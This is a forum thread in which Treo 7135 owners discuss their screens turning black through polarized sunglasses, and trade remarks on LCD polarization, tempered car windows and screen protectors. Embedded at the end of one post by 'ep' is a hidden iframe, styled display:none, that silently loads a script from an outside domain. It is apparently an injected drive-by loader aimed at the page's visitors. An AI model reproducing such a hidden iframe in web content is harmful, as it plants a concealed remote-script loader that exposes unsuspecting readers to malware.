+ Reply to Thread
Page 1 of 2 1 2 LastLast
    ep

Polarized sunglasses and 7135 woes

Has anyone here noticed that the 7135 is polarized vertically?

When I wear my polarized sunglasses to block out sun glare while driving, my 7135 screen appears to be black. It's emitting polarized light that is perpendicular to the polarization of my sunglasses!

Ungh.

If I just need to look at the screen really quick, I can turn the 7135 sideways. It's awkward, but ok. If I need to actually use it, though (dial, palm, whatever), I have to take off my sunglasses.

I wonder why it was done like that. My navigation system in my car is polarized on a slant. If I turn my head 45 degrees to the screen, it looks black, but otherwise, it is fine.

oh well, still the coolest phone in the world. I just put on my b-strong screen protectors which don't suffer from the weird frenzel effect of the WriteRIGHTs. Now, if I could just find a nice telescoping stylus (like the Tungsten) I'd be set!

ep<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    --ep

Polarization

I have the same problem, but haven't figured out what to do about it. As you say, it is still the coolest thing.

By the way, where do you get screen protectors that aren't terrible? I have tried a couple and the bubble and look bad on the screen. Any help?

You are sooooo right! I had to use my old out dated shades.

I noticed this too, I just bought some polarized sunglasses last Sunday (first pair I ever had). The screen wasn't really black though, it was more of a dark blue. I thought that it was interesting, but not really a problem, as I'm usually using a headset and voice commands while in the car anyway. And if I'm not in the car then taking my sunglasses off is no big deal.
    Sorry, but I no longer make 7135 headset adapters.

7135 App Developer davewalthall's Avatar
    You could always get (or make) a polarized screen protector. If you place it at 45deg from vertical, then some of the light gets through polarized at 45 deg. Some of that light will make it through your sun glasses. Certainly not ideal, since it will reduce the brightness of your screen. It might work better to just have a piece of polarizer between your PDA screen and you in the car, that way you won't lose the intensity all of the time, just when you are in the car.

David
    char *p="char *p=%c%s%c;main(){printf(p,34,p,34);}";main(){printf(p,34,p,34);}

Just for the sake of accuracy, and not to be a pain, polarized
    sunglasses are polarized vertically, since a great deal of reflected
    light comes off horizontally (parallel to the surface from which it
    reflects, like water, roads, car hoods, etc.), and is thus precluded
    from coming through your glasses to your eyes. This means that
    if you are unable to see your screen, then it is in fact horizontally
    polarized.

I've noticed problems with my watch (since it is polarized vertically
    like my sunglasses, and I wear my watch on the inside of my
    wrist, so I put my arm up in front of my face and it's black. This
    makes it look to other drivers on the road that I'm elbowing an
    imaginary man that is on my left.

Gas pumps give some weird effects too, and have you noticed the
    rear windshields of some cars, how they have a spotted
    checkerboard type of thing?

BS

That's basically how an LCD works...depending on the signal on the liquid crystal, it either polarizes light passing through it in phase or out of phase with a fixed polarizing filter, essentially turning that pixel on or off. I used to think it was cool as a kid to turn a digital watch 90 degrees to make the screen go black.
    LART 'em all! Let /root grep 'em out!

jeh
    Originally posted by davewalthall
    You could always get (or make) a polarized screen protector. If you place it at 45deg from vertical, then some of the light gets through polarized at 45 deg. Some of that light will make it through your sun glasses.
    Sorry, but no.

The problem here is that the light from the screen starts out polarized differently from what will get through his sunglasses in their normal orientation. There's no way that adding yet another polarization filter will help -- these filters don't change (rotate) the polarization of light passing through them at all; they just throw away what doesn't match their orientation.

What you're suggesting is similar to taking a red LED and trying to filter it to blue or green. Alas the red LED isn't emitting any blue or green wavelengths in the first place, so all a filter is going to do is reduce the amount of red, maybe to zero if its passband is narrow enough.

Originally posted by ricosuave
    You are sooooo right! I had to use my old out dated shades.
    So instead of ricosuave it's more like Rico Tubbs in your Miami Vice style shades? :p
    Please visit my picture site: Robert-O-Rama :)

LOL! :Fro: I've been silently lamenting about not being able to view my screen with my polarized prescription sunglasses since Day 1. But it seemed like such a nitpicky whiny thing to say, that I never posted about it! In fact it STILL seems like a nitpicky whiny thing to gripe about! :bawling :violinist

ep
    Originally posted by lyron
    Just for the sake of accuracy, and not to be a pain, polarized sunglasses are polarized vertically, since a great deal of reflected

Gas pumps give some weird effects too, and have you noticed the rear windshields of some cars, how they have a spotted checkerboard type of thing?
    Y'know, I was going to look it up on howstuffworks.com to make sure I had my hortiz and vert correct, but I knew on this board someone would correct me. That way I didn't have to waste bandwidth looking it up

Yeah, I've noticed the gas pumps and other cars. My theory (here we go) on the car windshields is a sort of spatial polarization between the glass and the film. This way it can reduce glare without polarizing the whole thing. Or, it's just a weird effect of the manufacturing.

Regardless, I don't think it's that picky to talk about. I wonder if other color palms suffer from this, too....
    --ep

ep
    David,
    Nice signature.
    David,
    Nice signature.
    David,
    Nice signature.

Ok, that's enough (and yeah, I know it's not really recursive, but it's still cool).
    --ep

I use polarized sunglasses, but have never noticed not being able to see the screen until you brought it up. I only use the glasses when I'm driving, and you shouldn't be looking at your 7135 while your driving. I guess the rest of you are having problems while outside doing other things.
    If at first you don't succeed, don't try sky diving.

ep
    Originally posted by Steve B.
    I guess the rest of you are having problems while outside doing other things.
    Yeah, but mostly while I'm text messaging people while driving (just kidding).

Hey Steve, do you succeed the first time? (do you jump?)
    --ep

Hmmm, I guess this will become an issue since I wear polarized glasses outside at all times, and I'm expecting my phone by the end of the month. I guess I'll have to configure my phone holder side ways a little bit.

I may be atypical, but I actually find it kind of pretty through my polarized sunglasses. If I hold the phone straight up, it gets this green to orange shimmer, and if I turn it sideways, the screen background turns a lovely deep purple. I don't find it interferes with being able to read text. One interesting thing was, I've had a warranty replacement on my phone, and on the first one, it was the deep purple straight up. So I guess the orientation of polarization must vary between batches of phones.

jeh
    Hmm... it may also vary with your contrast setting.

Maybe it's a bit late in the thread to be asking this question.... but what are polarized sunglasses???
    Please visit my picture site: Robert-O-Rama :)

ep
    Originally posted by Robert K.
    Maybe it's a bit late in the thread to be asking this question.... but what are polarized sunglasses???
    I love www.howstuffworks.com, they have a great description here:

http://travel.howstuffworks.com/sunglass4.htm
    --ep

> Yeah, I've noticed the gas pumps and other cars. My theory
    > (here we go) on the car windshields is a sort of spatial
    > polarization between the glass and the film. This way it can
    > reduce glare without polarizing the whole thing.

> Or, it's just a weird effect of the manufacturing.

Exactly. I wasn't going to bring this up unless someone was
    interested, but my father tells me it's because the side and
    rear windows are thermally treated (tempered, essentially)
    so that when they break, they shatter into a great number of
    pieces, thereby reducing the risk of getting cut (and I'm sure
    you've all seen piles of glass after accidents, or around parked
    cars in my neighborhood that had nice stereos). The way that
    the tempering is done is that the glass is suspended over an
    array or grid of burners (like bunsen burners) for some period
    of time. Each of those dots you see is where a burner was.

Another very interesting effect:
    Look at those vans that came out about 10 years ago, with the very
    sloped front edge (the vans look like giant Dustbusters) - the
    front windshields appear extremely purple when wearing polarized
    glasses (and the color goes away when you turn the sunglasses or
    your head vertically). I've also seen some fancy cars (Lincolns,
    or something similar) that have a gold tint to them through the
    glasses.

Polarized sunglasses are remarkable devices, you see things out
    in the world that nobody else can see (a la the glasses in the movie
    "They Live", with Roddy Piper).

BS